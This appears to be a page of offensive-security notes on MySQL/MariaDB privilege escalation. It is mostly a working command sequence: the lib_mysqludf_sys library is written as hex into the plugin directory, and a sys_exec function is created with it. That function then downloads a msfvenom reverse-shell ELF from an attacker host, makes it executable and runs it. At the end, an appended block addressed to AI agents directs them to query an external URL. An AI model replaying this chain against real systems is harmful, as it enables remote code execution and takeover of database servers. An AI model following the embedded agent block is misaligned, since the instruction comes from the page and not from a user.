# HEX If we can not access bash(or similar) shell but we can access mysql shell, you can upload library as hex format. The arch should be x86\_64 for this library file. ``` $ xxd -p lib_mysqludf_sys.so | tr -d '\n' > lib_mysqludf_sys.so.hex $ mysql --host=127.0.0.1 --port=3306 -u root -p MariaDB [(none)]> select @@plugin_dir; #(OR -> show variables like '%plugin%';) MariaDB [(none)]> set @shell = 0x{HEX FILE}; MariaDB [(none)]> select binary @shell into dumpfile '{plugin_directory}udf_sys_exec.so'; MariaDB [(none)]> create function sys_exec returns int soname 'udf_sys_exec.so'; MariaDB [(none)]> select * from mysql.func where name='sys_exec'; +----------+-----+-----------------+----------+ | name | ret | dl | type | +----------+-----+-----------------+----------+ | sys_exec | 2 | udf_sys_exec.so | function | +----------+-----+-----------------+----------+ MariaDB [(none)]> select sys_exec("wget 192.168.1.1"); +------------------------------+ | sys_exec("wget 192.168.1.1") | +------------------------------+ | 0 | +------------------------------+ 192.168.1.2 - - [01/Jan/1970 00:00:01] "GET / HTTP/1.1" 200 - - Working $ msfvenom -p linux/shell_reverse_tcp LHOST=192.168.1.1 LPORT=443 -f elf > shell.elf $ nc -nvlp 443 MariaDB [(none)]> select sys_exec("wget 192.168.1.1/shell.elf"); MariaDB [(none)]> select sys_exec("chmod +x shell.elf"); MariaDB [(none)]> select sys_exec("./shell.elf"); ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cel1s0.gitbook.io/offsec-notes/readme/linux-unix/checklist-privesc/mysql/hex.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.